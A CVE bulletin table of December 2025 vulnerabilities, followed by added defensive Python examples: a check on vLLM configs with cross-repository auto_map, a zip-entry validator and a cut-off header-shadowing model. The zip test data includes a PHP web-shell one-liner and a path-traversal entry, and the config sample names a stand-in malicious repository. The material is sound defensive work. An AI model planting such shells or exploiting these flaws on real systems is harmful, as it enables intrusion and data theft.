| stylemix--Cost Calculator Builder | The Cost Calculator Builder plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the deleteOrdersFiles() function in all versions up to, and including, 3.6.3. This makes it possible for unauthenticated attackers to inject arbitrary file paths into the orders that are removed, when an administrator deletes them. This can lead to remote code execution when the right file is deleted (such as wp-config.php). This vulnerability requires the Cost Calculator Builder Pro version to be installed along with the free version in order to be exploitable. | 2025-12-02 | 8.8 | CVE-2025-12529 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4154684d-3f9b-418f-b9d1-a5d22d4d84d3?source=cve https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.1/includes/classes/CCBOrderController.php#L513 https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.1/includes/classes/CCBOrderController.php#L262 |
| Sunbird--DCIM dcTrack | DCIM dcTrack allows an attacker to misuse certain remote access features. An authenticated user with access to the appliance's virtual console could exploit these features to redirect network traffic, potentially accessing restricted services or data on the host machine. | 2025-12-04 | 7.2 | CVE-2025-66238 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-05 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-338-05.json |
| Synology--BeeDrive for desktop | Missing authentication for critical function vulnerability in BeeDrive in Synology BeeDrive for desktop before 1.4.2-13960 allows local users to execute arbitrary code via unspecified vectors. | 2025-12-04 | 7.8 | CVE-2025-54158 | Synology-SA-25:08 BeeDrive for desktop |
| Synology--BeeDrive for desktop | Missing authorization vulnerability in BeeDrive in Synology BeeDrive for desktop before 1.4.2-13960 allows remote attackers to delete arbitrary files via unspecified vectors. | 2025-12-04 | 7.5 | CVE-2025-54159 | Synology-SA-25:08 BeeDrive for desktop |
| Synology--BeeDrive for desktop | Improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability in BeeDrive in Synology BeeDrive for desktop before 1.4.2-13960 allows local users to execute arbitrary code via unspecified vectors. | 2025-12-04 | 7.8 | CVE-2025-54160 | Synology-SA-25:08 BeeDrive for desktop |
| Synology--DiskStation Manager (DSM) | Cross-Site Request Forgery (CSRF) vulnerability in WebAPI Framework in Synology DiskStation Manager (DSM) before 7.2.1-69057-2 and 7.2.2-72806 and Synology Unified Controller (DSMUC) before 3.1.4-23079 allows remote attackers to execute arbitrary code via unspecified vectors. | 2025-12-04 | 9.6 | CVE-2024-45538 | Synology-SA-24:27 DSM |
| Synology--DiskStation Manager (DSM) | Out-of-bounds write vulnerability in cgi components in Synology DiskStation Manager (DSM) before 7.2.1-69057-2 and 7.2.2-72806 and Synology Unified Controller (DSMUC) before 3.1.4-23079 allows remote attackers to conduct denial-of-service attacks via unspecified vectors. | 2025-12-04 | 7.5 | CVE-2024-45539 | Synology-SA-24:27 DSM |
| Synology--Synology Router Manager (SRM) | A vulnerability in portenable cgi allows remote authenticated users to get the status of installed packages. | 2025-12-04 | 7.2 | CVE-2025-29846 | Synology-SA-25:04 SRM |
| Syslifters--sysreptor | SysReptor is a fully customizable pentest reporting platform. Prior to 2025.102, a Stored Cross-Site Scripting (XSS) vulnerability allows authenticated users to execute malicious JavaScript in the context of other logged-in users by uploading malicious JavaScript files in the web UI. This vulnerability is fixed in 2025.102. | 2025-12-04 | 7.3 | CVE-2025-66561 | https://github.com/Syslifters/sysreptor/security/advisories/GHSA-64vw-v5c4-mgvm |
| ThinkInAIXYZ--deepchat | DeepChat is a smart assistant that uses artificial intelligence. In 0.5.0 and earlier, a Stored Cross-Site Scripting (XSS) vulnerability in the Mermaid diagram renderer allows an attacker to execute arbitrary JavaScript within the application context. By leveraging the exposed Electron IPC bridge, this XSS can be escalated to Remote Code Execution (RCE) by registering and starting a malicious MCP (Model Context Protocol) server. | 2025-12-03 | 9.7 | CVE-2025-66222 | https://github.com/ThinkInAIXYZ/deepchat/security/advisories/GHSA-v8v5-c872-mf8r https://github.com/ThinkInAIXYZ/deepchat/commit/371ca7b42e3685aee6e3f0c61e85277ed1ff4db7 |
| TOZED--ZLT M30S | A vulnerability has been found in TOZED ZLT M30S and ZLT M30S PRO 1.47/3.09.06. Affected is an unknown function of the component Web Interface. Such manipulation leads to hard-coded credentials. The attack needs to be initiated within the local network. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-06 | 8.8 | CVE-2025-14126 | VDB-334521; TOZED ZLT M30S/ZLT M30S PRO Web hard-coded credentials VDB-334521; CTI Indicators (IOB, IOC, TTP) Submit #697498; ZLT M30S & M30S PRO MTNNGRM30S_1.47, M30SPRO_3.09.06 (Other versions might be vulnerable) Backdoor Credentials https://youtu.be/o8rfjSlpRxY |
| TrippWasTaken--PHP-Guitar-Shop | A weakness has been identified in TrippWasTaken PHP-Guitar-Shop up to 6ce0868889617c1975982aae6df8e49555d0d555. This vulnerability affects unknown code of the file /product.php of the component Product Details Page. Manipulation of the argument ID can lead to SQL injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited. This product uses rolling releases to provide continuous delivery, so version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 7.3 | CVE-2025-14091 | VDB-334481; TrippWasTaken PHP-Guitar-Shop Product Details product.php sql injection VDB-334481; CTI Indicators (IOB, IOC, TTP, IOA) Submit #696514; PHP-Guitar-Shop web 1 SQL Injection https://github.com/appaxv/report/blob/main/guitarshopsql.docx |
| trustindex--Widgets for Google Reviews | The Widgets for Google Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 13.2.4 due to insufficient input sanitization and output escaping on Google Reviews data imported by the plugin. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that will execute in the admin panel (and potentially on the frontend) whenever a user accesses imported reviews, granted they can add a malicious review to a Google Place that is connected to the vulnerable site. | 2025-12-06 | 7.2 | CVE-2025-12510 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7adf3335-ed13-43f4-a5f3-05e89be44d2d?source=cve https://plugins.trac.wordpress.org/browser/wp-reviews-plugin-for-google/tags/13.2.1/trustindex-plugin.class.php#L5932 https://plugins.trac.wordpress.org/browser/wp-reviews-plugin-for-google/tags/13.2.1/trustindex-plugin.class.php#L5907 https://plugins.trac.wordpress.org/changeset/3399469/wp-reviews-plugin-for-google/trunk/trustindex-plugin.class.php?old=3398822&old_path=wp-reviews-plugin-for-google%2Ftrunk%2Ftrustindex-plugin.class.php |
| tsaiid--Featured Image via URL | The Featured Image via URL plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 0.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-05 | 8.8 | CVE-2025-12153 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9687a88f-ac5b-4746-a68c-91c358b5fb87?source=cve https://wordpress.org/plugins/featured-image-via-url/ |
| Ubuntu--MAAS | An Improper Input Validation vulnerability exists in the user websocket handler of MAAS. An authenticated, unprivileged attacker can intercept a user.update websocket request and inject the is_superuser property set to true. The server improperly validates this input, allowing the attacker to self-promote to an administrator role. This results in full administrative control over the MAAS deployment. | 2025-12-03 | 7.7 | CVE-2025-7044 | https://bugs.launchpad.net/maas/+bug/2115714 |
| UGREEN--DH2100+ | A weakness has been identified in UGREEN DH2100+ up to 5.3.0.251125. This affects the function handler_file_backup_create of the file /v1/file/backup/create of the component nas_svr. Executing manipulation of the argument path can lead to buffer overflow. The attack can be executed remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 7.2 | CVE-2025-14187 | VDB-334607; UGREEN DH2100+ nas_svr create handler_file_backup_create buffer overflow VDB-334607; CTI Indicators (IOB, IOC, IOA) Submit #698652; UGREEN DH2100+ NAS V4.2.0.601 Buffer Overflow https://www.notion.so/2b16cf4e528a80bbb5fdeff145f110ec |
| UGREEN--DH2100+ | A security vulnerability has been detected in UGREEN DH2100+ up to 5.3.0.251125. This impacts the function handler_file_backup_create of the file /v1/file/backup/create of the component nas_svr. The manipulation of the argument path leads to command injection. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 7.2 | CVE-2025-14188 | VDB-334608; UGREEN DH2100+ nas_svr create handler_file_backup_create command injection VDB-334608; CTI Indicators (IOB, IOC, TTP, IOA) Submit #698833; UGREEN DH2100+ NAS V4.2.0.601 Remote Command Execution https://www.notion.so/25e2b76e8e0c80578014fff04a950576 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-11131 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-11132 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-11133 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In dpc modem, there is a possible system crash due to null pointer dereference. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-3012 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-61607 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-61608 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-61609 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-61610 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-61617 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-61618 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-61619 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| UTT--进取 512W | A vulnerability has been found in UTT 进取 512W up to 1.7.7-171114. Affected by this issue is the function strcpy of the file /goform/formP2PLimitConfig. Such manipulation of the argument except leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 8.8 | CVE-2025-14191 | VDB-334611 | UTT 进取 512W formP2PLimitConfig strcpy buffer overflow VDB-334611 | CTI Indicators (IOB, IOC, IOA) Submit #699220 | UTT艾泰 进取 512W Router <=v3v1.7.7-171114 Buffer Overflow https://github.com/DavCloudz/cve/blob/main/UTT/512W/UTT%20512W%20Buffer%20Overflow%20Vulnerability.md https://github.com/DavCloudz/cve/blob/main/UTT/512W/UTT%20512W%20Buffer%20Overflow%20Vulnerability.md#poc |
| UTT--进取 520W | A flaw has been found in UTT 进取 520W 1.7.7-180627. The impacted element is the function strcpy of the file /goform/formArpBindConfig. Executing manipulation of the argument pools can lead to buffer overflow. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-06 | 8.8 | CVE-2025-14141 | VDB-334529 | UTT 进取 520W formArpBindConfig strcpy buffer overflow VDB-334529 | CTI Indicators (IOB, IOC, IOA) Submit #698522 | UTT 进取 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/13.md https://github.com/cymiao1978/cve/blob/main/new/13.md#poc |
| vim--vim | Vim is an open source, command line text editor. Prior to version 9.1.1947, an uncontrolled search path vulnerability on Windows allows Vim to execute malicious executables placed in the current working directory of the file being edited. On Windows, when using cmd.exe as a shell, Vim resolves external commands by searching the current working directory before system paths, so when Vim invokes tools such as findstr for :grep, external commands or filters via :!, or compiler/:make commands, it may inadvertently run a malicious executable present in the same directory as the file being edited. Only Vim for Windows is affected; the fix is in version 9.1.1947. | 2025-12-02 | 7.8 | CVE-2025-66476 | https://github.com/vim/vim/security/advisories/GHSA-g77q-xrww-p834 https://github.com/vim/vim/commit/083ec6d9a3b7b09006e0ce69ac802597d25 https://github.com/vim/vim/releases/tag/v9.1.1947 |
| vinoth06--User Generator and Importer | The User Generator and Importer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to and including 1.2.2. This is due to missing nonce validation in the "Import Using CSV File" function. This makes it possible for unauthenticated attackers to elevate user privileges by creating arbitrary accounts with administrator privileges via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 8.8 | CVE-2025-12879 | https://www.wordfence.com/threat-intel/vulnerabilities/id/82699a17-ea45-4493-98c4-07f62ca0b1f9?source=cve https://plugins.trac.wordpress.org/browser/user-importer-and-generator/tags/1.2.2/user-generator.php#L145 |
| vllm-project--vllm | vLLM is an inference and serving engine for large language models (LLMs). Prior to 0.11.1, vllm has a critical remote code execution vector in a config class named Nemotron_Nano_VL_Config. When vllm loads a model config that contains an auto_map entry, the config class resolves that mapping with get_class_from_dynamic_module(...) and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the auto_map string. Crucially, this happens even when the caller explicitly sets trust_remote_code=False in vllm.transformers_utils.config.get_config. In practice, an attacker can publish a benign-looking frontend repo whose config.json points via auto_map to a separate malicious backend repo; loading the frontend will silently run the backend's code on the victim host. This vulnerability is fixed in 0.11.1. | 2025-12-01 | 7.1 | CVE-2025-66448 | https://github.com/vllm-project/vllm/security/advisories/GHSA-8fr4-5q9j-m8gm https://github.com/vllm-project/vllm/pull/28126 https://github.com/vllm-project/vllm/commit/ffb08379d8870a1a81ba82b72797f196838d0c86 |
| widgetpack--Rich Shortcodes for Google Reviews | The Rich Shortcodes for Google Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the contents of a Google Review in all versions up to, and including, 6.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability was partially patched in version 6.6.2. | 2025-12-06 | 7.2 | CVE-2025-12499 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e2960224-4446-4fc6-8d18-6f9911b4cbad?source=cve https://plugins.trac.wordpress.org/changeset/3411521/widget-google-reviews https://plugins.trac.wordpress.org/changeset/3389203/widget-google-reviews |
| wpchill--Image Gallery Photo Grid & Video Gallery | The Modula Image Gallery plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'ajax_unzip_file' function in versions 2.13.1 to 2.13.2. This makes it possible for authenticated attackers, with Author-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). | 2025-12-03 | 7.2 | CVE-2025-13645 | https://www.wordfence.com/threat-intel/vulnerabilities/id/080683bb-713f-4aa8-b635-90c96f358bec?source=cve https://plugins.trac.wordpress.org/browser/modula-best-grid-gallery/tags/2.13.2/includes/admin/class-modula-gallery-upload.php#L1025 https://plugins.trac.wordpress.org/browser/modula-best-grid-gallery/tags/2.13.2/includes/admin/class-modula-gallery-upload.php#L1119 https://plugins.trac.wordpress.org/changeset/3395701/modula-best-grid-gallery#file5 https://github.com/WPChill/modula-lite/commit/90c8eb982f71b31584d9be9359e3b594e03927d7 https://plugins.trac.wordpress.org/changeset/3407949/modula-best-grid-gallery |
| wpchill--Image Gallery Photo Grid & Video Gallery | The Modula Image Gallery plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'ajax_unzip_file' function in versions 2.13.1 to 2.13.2. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files to the affected site's server by exploiting a race condition, which may make remote code execution possible. | 2025-12-03 | 7.5 | CVE-2025-13646 | https://www.wordfence.com/threat-intel/vulnerabilities/id/59ee0ca2-846d-4ae8-ad19-7c3826861aeb?source=cve https://github.com/WPChill/modula-lite/blob/master/includes/admin/class-modula-gallery-upload.php#L1103 https://plugins.trac.wordpress.org/changeset/3395701/modula-best-grid-gallery#file5 https://github.com/WPChill/modula-lite/commit/90c8eb982f71b31584d9be9359e3b594e03927d7 https://plugins.trac.wordpress.org/changeset/3407949/modula-best-grid-gallery |
| wphocus--My auctions allegro | The My auctions allegro plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.6.32 via the 'controller' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included. | 2025-12-05 | 8.1 | CVE-2025-12851 | https://www.wordfence.com/threat-intel/vulnerabilities/id/202a8493-6df0-4a5e-b6bf-099219830e01?source=cve https://plugins.trac.wordpress.org/changeset/3402268/my-auctions-allegro-free-edition |
| wphocus--My auctions allegro | The My auctions allegro plugin for WordPress is vulnerable to SQL Injection via the 'auction_id' parameter in all versions up to, and including, 3.6.32 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-05 | 7.5 | CVE-2025-12850 | https://www.wordfence.com/threat-intel/vulnerabilities/id/dc4883b8-5783-49ff-ab3b-c568c9923227?source=cve https://plugins.trac.wordpress.org/changeset/3402268/my-auctions-allegro-free-edition |
| wpkube--Cool Tag Cloud | The Cool Tag Cloud plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cool_tag_cloud' shortcode in all versions up to, and including, 2.29 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-05 | 8.1 | CVE-2025-13614 | https://www.wordfence.com/threat-intel/vulnerabilities/id/eac56190-4f81-464d-9737-ae2e3d4b0d0d?source=cve http://plugins.trac.wordpress.org/browser/cool-tag-cloud/trunk/cool-tag-cloud.php?marks=798-799#L682 |
| xwikisas--xwiki-pro-macros | XWiki Remote Macros provides XWiki rendering macros that are useful when migrating content from Confluence. Prior to 1.27.1, the macro executes Velocity from the details pages without checking for permissions, which can lead to remote code execution. This vulnerability is fixed in 1.27.1. | 2025-12-05 | 8.3 | CVE-2025-65036 | https://github.com/xwikisas/xwiki-pro-macros/security/advisories/GHSA-472x-fwh9-r82f |
| yhirose--cpp-httplib | cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to 0.27.0, a vulnerability allows attacker-controlled HTTP headers to influence server-visible metadata, logging, and authorization decisions. An attacker can inject headers named REMOTE_ADDR, REMOTE_PORT, LOCAL_ADDR, LOCAL_PORT that are parsed into the request header multimap via read_headers() in httplib.h (headers.emplace), then the server later appends its own internal metadata using the same header names in Server::process_request without erasing duplicates. Because Request::get_header_value returns the first entry for a header key (id == 0) and the client-supplied headers are parsed before server-inserted headers, downstream code that uses these header names may inadvertently use attacker-controlled values. Affected files/locations: cpp-httplib/httplib.h (read_headers, Server::process_request, Request::get_header_value, get_header_value_u64) and cpp-httplib/docker/main.cc (get_client_ip, nginx_access_logger, nginx_error_logger). Attack surface: attacker-controlled HTTP headers in incoming requests flow into the Request.headers multimap and into logging code that reads forwarded headers, enabling IP spoofing, log poisoning, and authorization bypass via header shadowing. This vulnerability is fixed in 0.27.0. | 2025-12-05 | 10 | CVE-2025-66570 | https://github.com/yhirose/cpp-httplib/security/advisories/GHSA-xm2j-vfr9-mg9m https://github.com/yhirose/cpp-httplib/commit/ac9ebb0ee333ce8bf13523f487bdfad9518a2aff |
| ZDoom--gzdoom | GZDoom is an open source, feature-centric port for all Doom engine games. In versions 4.14.2 and earlier, ZScript actor state handling allows scripts to read arbitrary addresses, write constants into the JIT-compiled code section, and redirect control flow through crafted FState and VMFunction structures. A script can copy FState structures into a writable buffer, modify function pointers and state transitions, and cause execution of attacker-controlled bytecode, leading to arbitrary code execution. | 2025-12-03 | 7.8 | CVE-2025-54065 | https://github.com/ZDoom/gzdoom/security/advisories/GHSA-prhc-chfw-32jg |
| ZSPACE--Q2C NAS | A vulnerability was identified in ZSPACE Q2C NAS up to 1.1.0210050. Affected is the function zfilev2_api.CloseSafe of the file /v2/file/safe/close of the component HTTP POST Request Handler. The manipulation of the argument safe_dir leads to command injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 8.8 | CVE-2025-14106 | VDB-334488 | ZSPACE Q2C NAS HTTP POST Request close zfilev2_api.CloseSafe command injection VDB-334488 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #697141 | ZSPACE Q2C NAS v1.1.0210050 Command Injection https://www.notion.so/2af6cf4e528a80bab847dcc1fb677590 |
| ZSPACE--Q2C NAS | A security flaw has been discovered in ZSPACE Q2C NAS up to 1.1.0210050. Affected by this vulnerability is the function zfilev2_api.SafeStatus of the file /v2/file/safe/status of the component HTTP POST Request Handler. The manipulation of the argument safe_dir results in command injection. The attack may be performed from remote. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 8.8 | CVE-2025-14107 | VDB-334489 | ZSPACE Q2C NAS HTTP POST Request status zfilev2_api.SafeStatus command injection VDB-334489 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #697143 | ZSPACE Q2C NAS v1.1.0210050 Command Injection https://www.notion.so/2af6cf4e528a8001935bcdd9e77f1ebc |
| ZSPACE--Q2C NAS | A weakness has been identified in ZSPACE Q2C NAS up to 1.1.0210050. Affected by this issue is the function zfilev2_api.OpenSafe of the file /v2/file/safe/open of the component HTTP POST Request Handler. This manipulation of the argument safe_dir causes command injection. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 8.8 | CVE-2025-14108 | VDB-334490 | ZSPACE Q2C NAS HTTP POST Request open zfilev2_api.OpenSafe command injection VDB-334490 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #697144 | ZSPACE Q2C NAS v1.1.0210050 Command Injection https://www.notion.so/2af6cf4e528a80258f60fa529c48d291 |
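Worked example for the vLLM entry (CVE-2025-66448) above: a pre-load check that refuses a model config.json whose auto_map points at a different repository, regardless of the trust_remote_code setting. This is added illustration code, not vLLM's or transformers' own; it assumes the "org/repo--module.Class" naming convention for cross-repository auto_map values, and the sample configs are constructed.

```python
"""Flag model configs whose auto_map entries would pull code from another repo.

Added example, not vLLM or transformers code. Assumes the HF convention that
an auto_map value of the form "org/repo--module.Class" names a class in a
different repository, while "module.Class" names a file shipped with the model.
"""
import json
from typing import Dict, List

# Constructed sample: a "frontend" config.json that points at a separate backend repo.
SUSPICIOUS_CONFIG = json.dumps({
    "model_type": "example_vl",
    "auto_map": {
        "AutoConfig": "evil-org/backend-repo--configuration_backend.BackendConfig",
        "AutoModel": "modeling_local.LocalModel",
    },
})

# Constructed sample: dynamic code, but shipped inside the same repo.
LOCAL_CONFIG = json.dumps({
    "model_type": "llama",
    "auto_map": {"AutoModel": "modeling_llama.Model"},
})

# Constructed sample: a plain config with no dynamic code at all.
PLAIN_CONFIG = json.dumps({"model_type": "llama"})


def remote_auto_map_entries(config_text: str) -> List[Dict[str, str]]:
    """Return auto_map entries whose class lives in a different repository.

    Each finding is {"key": <auto_map key>, "repo": <repo id>, "target": <module.Class>}.
    """
    cfg = json.loads(config_text)
    findings = []
    for key, value in (cfg.get("auto_map") or {}).items():
        if not isinstance(value, str):
            continue
        if "--" in value:
            repo, target = value.split("--", 1)
            findings.append({"key": key, "repo": repo, "target": target})
    return findings


def has_dynamic_code(config_text: str) -> bool:
    """True if the config asks the loader to import any model-shipped Python at all."""
    return bool(json.loads(config_text).get("auto_map"))


def assess(config_text: str, trust_remote_code: bool = False) -> str:
    """Decide whether loading this config is acceptable under the caller's trust setting.

    Policy (assumed for this example, not vLLM's): a config that needs dynamic code is
    only loadable with trust_remote_code=True, and a config that points at a *different*
    repository is refused outright, because that repository is not the one the operator
    vetted when they chose the model.
    """
    if remote_auto_map_entries(config_text):
        return "refuse: auto_map references code in another repository"
    if has_dynamic_code(config_text) and not trust_remote_code:
        return "refuse: dynamic code requires trust_remote_code=True"
    return "ok"
```

Run the check on the downloaded config.json before handing the model directory to the serving engine; the point is that the decision is made from the file contents, not from a flag the loader may ignore.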
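Worked example for the two Modula Image Gallery entries (CVE-2025-13645 and CVE-2025-13646) above: the two checks those advisories say the unzip routine lacked, path containment and a file-type allowlist, applied to every archive entry before anything is written. This is added illustration code in Python, not the plugin's PHP; the sample archive, the destination directory and the allowed extension set are constructed for the example. It generalises slightly beyond the advisories by also rejecting absolute and drive-letter entry names.

```python
"""Validate zip entries before extraction: path containment and file-type allowlist.

Added example, not Modula plugin code. Shows the checks a gallery upload handler
needs so that an archive entry can neither land outside the destination directory
nor drop an executable file type into it. The sample archive is constructed in memory.
"""
import io
import os
import posixpath
import zipfile
from typing import List, Tuple

# Assumed policy for a gallery uploader: images only.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".webp"}


def build_sample_zip() -> bytes:
    """Constructed archive: two benign images plus three entries that must be rejected."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("gallery/a.jpg", b"\xff\xd8\xff")
        zf.writestr("gallery/sub/b.png", b"\x89PNG")
        zf.writestr("../../wp-config.php", b"<?php")                 # path traversal
        zf.writestr("/etc/cron.d/job", b"* * * * * root id")          # absolute path
        zf.writestr("gallery/shell.php", b"<?php system($_GET['c']);")  # wrong type
    return buf.getvalue()


def check_entry(name: str, dest: str) -> Tuple[bool, str]:
    """Return (ok, reason) for one archive entry. dest must be an absolute, real path."""
    is_dir = name.endswith("/")
    # Zip names use '/', but Windows separators and drive letters appear in the wild.
    if name.startswith(("/", "\\")) or (len(name) > 1 and name[1] == ":"):
        return False, "absolute path"
    norm = posixpath.normpath(name)
    if norm == ".." or norm.startswith("../"):
        return False, "path traversal"
    # Resolve and confirm the entry still sits under dest (catches symlinked parents).
    target = os.path.realpath(os.path.join(dest, *norm.split("/")))
    if os.path.commonpath([dest, target]) != dest:
        return False, "escapes destination"
    if is_dir:
        return True, "directory"
    ext = posixpath.splitext(norm)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"disallowed file type {ext or '(none)'}"
    return True, "ok"


def plan_extraction(zip_bytes: bytes, dest: str) -> Tuple[List[str], List[Tuple[str, str]]]:
    """Split entries into those safe to write and those rejected, with reasons."""
    dest = os.path.realpath(dest)
    accepted: List[str] = []
    rejected: List[Tuple[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            ok, reason = check_entry(info.filename, dest)
            if ok:
                accepted.append(info.filename)
            else:
                rejected.append((info.filename, reason))
    return accepted, rejected


def safe_extract(zip_bytes: bytes, dest: str) -> List[str]:
    """Write only the accepted file entries; never call ZipFile.extractall on user input."""
    dest = os.path.realpath(dest)
    written: List[str] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            ok, _ = check_entry(info.filename, dest)
            if not ok or info.filename.endswith("/"):
                continue
            target = os.path.join(dest, *posixpath.normpath(info.filename).split("/"))
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written
```

Rejecting the archive as a whole when any entry fails is the stricter option; the plan/extract split above is what lets a handler report which entry was the problem without having written anything first.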
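Worked example for the cpp-httplib entry (CVE-2025-66570) above: a Python model of the header shadowing the advisory describes, an insertion-ordered multimap where the first entry for a name wins, the client's headers parsed before the server appends REMOTE_ADDR and REMOTE_PORT, and a downstream check that trusts the result, next to the hardened variant that erases client-supplied copies of the metadata names first. This is added illustration code, not the library's C++; the raw request and the loopback-only check are constructed for the example.

```python
"""Header shadowing in a first-match header store, and the fix.

Added example, not cpp-httplib code. Models the described behaviour in Python:
request headers live in an insertion-ordered multimap, get_header_value returns
the first entry for a key, and the server appends REMOTE_ADDR/REMOTE_PORT after
the client's headers were already parsed. The sample request is constructed.
"""
from collections import defaultdict
from typing import Dict, List, Tuple

# Names the server uses for its own connection metadata.
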